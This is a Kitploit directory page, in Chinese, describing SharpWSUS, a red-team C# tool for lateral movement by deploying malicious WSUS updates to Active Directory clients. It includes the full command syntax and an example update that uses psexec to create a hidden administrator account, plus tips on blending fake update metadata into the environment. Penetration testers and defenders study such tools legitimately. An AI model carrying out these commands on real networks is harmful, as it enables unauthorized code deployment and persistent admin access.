Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SharpWSUS — 一款C#工具,用于通过WSUS进行横向移动,通过创建、批准和部署恶意更新到Active Directory环境中的目标Windows客户端。 | Kitploit
工具/GitHubGitHub/nettitude/sharpwsus
横向移动渗透测试红队
GitHubnettitude/sharpwsus

SharpWSUS

一款C#工具,用于通过WSUS进行横向移动,通过创建、批准和部署恶意更新到Active Directory环境中的目标Windows客户端。

查看仓库
503804年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

SharpWSUS

SharpWSUS 是一个用于通过 WSUS 进行横向移动的 CSharp 工具。对应的博客文章(https://labs.nettitude.com/blog/introducing-sharpwsus/)提供了关于该工具、使用场景和检测的更多详细信息。

致谢

极大感谢以下资源,它们确实为我完成了 90% 的工作。该工具只是对以下内容的增强,以实现 C2 的可靠性和灵活性。

  • https://github.com/AlsidOfficial/WSUSpendu - 用于滥用 WSUS 的 PowerShell 工具
  • https://github.com/ThunderGunExpress/Thunder_Woosus - 用于滥用 WSUS 的 CSharp 工具

帮助菜单

root@kitploit:~
 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team


以下命令中,可选参数放在 <> 中。

定位 WSUS 服务器:
    SharpWSUS.exe locate

检查 WSUS 服务器,枚举客户端、服务器和现有组:
    SharpWSUS.exe inspect

创建更新(注意:有效负载必须是 Windows 签名二进制文件):
    SharpWSUS.exe create /payload:[文件位置] /args:[有效负载参数] </title:[更新标题] /date:[YYYY-MM-DD] /kb:[更新 KB] /rating:[更新评级] /msrc:[MSRC] /description:[描述] /url:[url]>

批准更新:
    SharpWSUS.exe approve /updateid:[更新 GUID] /computername:[目标计算机] </groupname:[计算机要加入的组] /approver:[批准者名称]>

检查更新状态:
    SharpWSUS.exe check /updateid:[更新 GUID] /computername:[目标 FQDN]>

删除更新并清理添加的组:
    SharpWSUS.exe delete /updateid:[更新 GUID] /computername:[目标 FQDN] </groupname:[组名] /keepgroup>

使用示例

root@kitploit:~
sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user phil Password123! /add && net localgroup administrators phil /add\\"" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

备注

  • 二进制文件必须是 Windows 签名的,因此 psexec、msiexec、msbuild 等可能对横向移动有用。
  • create 命令中的元数据不是必需的,但有助于融入环境。
  • 如果在实验室中测试,第一次通常很快,但后续每次更新需要几个小时(这是因为 Windows 评估更新是否已安装的方式)。
下载工具